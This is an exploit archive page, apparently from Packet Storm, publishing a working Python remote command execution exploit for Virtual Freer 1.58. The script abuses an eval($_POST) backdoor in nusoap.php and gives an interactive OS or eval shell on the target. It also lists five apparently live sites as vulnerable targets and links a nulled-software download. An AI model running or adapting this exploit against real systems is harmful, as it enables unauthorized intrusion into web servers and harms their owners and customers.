exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Virtual Freer 1.58 Remote Command Execution

Virtual Freer 1.58 Remote Command Execution
Posted Feb 19, 2020
Authored by sajjadbnd

Virtual Freer version 1.58 suffers from a remote command execution vulnerability.

tags | exploit, remote
SHA-256 | bb45055d3b0821c9f811bb50219d643d27852b962614c30b2380584c86d67772

Virtual Freer 1.58 Remote Command Execution

Change Mirror Download
# Exploit title : Virtual Freer 1.58 - Remote Command Execution
# Exploit Author : SajjadBnd
# Date : 2020-02-17
# Vendor Homepage : http://freer.ir/virtual/
# Software Link : http://www.freer.ir/virtual/download.php?action=get
# Software Link(mirror) : http://dl.nuller.ir/virtual_freer_v1.58[NuLLeR.iR].zip
# Tested on : Ubuntu 19.10
# Version : 1.58
############################
# [ DESCRIPTION ]
#
# Free Script For Sell Charging Cards and Virtual Products
#
# [POC]
#
# Vulnerable file: /include/libs/nusoap.php
# 943: eval($_POST['a74ad8dfacd4f985eb3977517615ce25']);
#
# POST /include/libs/nusoap.php
# payload : a74ad8dfacd4f985eb3977517615ce25=system('uname -a');
#
# [ Sample Vulnerable Sites ]
#
# http://3cure.ir/buy/
# http://cheapcharger.ir/
# http://www.appraworld.ir/
# http://latoon.ir/
# http://novinv.ir/
#

import requests
import os
import sys

def clear():
linux = 'clear'
windows = 'cls'
os.system([linux, windows][os.name == 'nt'])

def Banner():
print '''
#################################################
# #
# Virtual Freer 1.58 - Remote Command Execution #
# SajjadBnd #
# BiskooitPedar #
# blackwolf@post.com #
#################################################
'''

def inputs():
target = raw_input('[*] URL : ')
while True:
try:
r = requests.get(target,verify=False)
start(target)
except requests.exceptions.MissingSchema:
target = "http://" + target

def start(target):
print "======================\n\n[!] Checking: ****()"
url = '%s/include/libs/nusoap.php' % (target)
body = {'a74ad8dfacd4f985eb3977517615ce25':'echo vulnerable;'}
r = requests.post(url,data=body,allow_redirects=False,timeout=50)
content = r.text.encode('utf-8')
if 'vulnerable' in content:
print "[+] vulnerable: ****()\n"
else:
print "[-] Target not Vulnerable!"
sys.exit(1)
print "\n[!] Checking: System()"
body = {'a74ad8dfacd4f985eb3977517615ce25':'system(id);'}
r = requests.post(url,data=body,allow_redirects=False,timeout=50)
content = r.text.decode('utf-8')
if 'gid' in content:
print "[+] vulnerable: system()\n"
osshell(url)
else:
print "[-] Target not Vulnerable to Running OS Commands!"
evalshell(url)

def osshell(url):
print "======================\n[+] You can run os commands :D\n"
while True:
try:
cmd = raw_input('OS_SHELL $ ')
command = "system('%s');" % (cmd)
body = {'a74ad8dfacd4f985eb3977517615ce25':command}
r = requests.post(url,data=body,allow_redirects=False,timeout=50)
content = r.text.encode('utf-8')
print "\n",content
except KeyboardInterrupt:
print "\n____________________\n[+] GoodBye :D"
sys.exit(1)

def evalshell(url):
print "======================\n[+] You can just run Eval Commands :D\n"
while True:
try:
cmd = raw_input('\nEval()=> ')
command = '%s;' % (cmd)
body = {'a74ad8dfacd4f985eb3977517615ce25':command}
r = requests.post(url,data=body,allow_redirects=False,timeout=50)
content = r.text.encode('utf-8')
print "\n",content
except KeyboardInterrupt:
print "\n____________________\n[+] ok! GoodBye :D"
sys.exit(1)

if __name__ == '__main__':
clear()
Banner()
inputs()
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close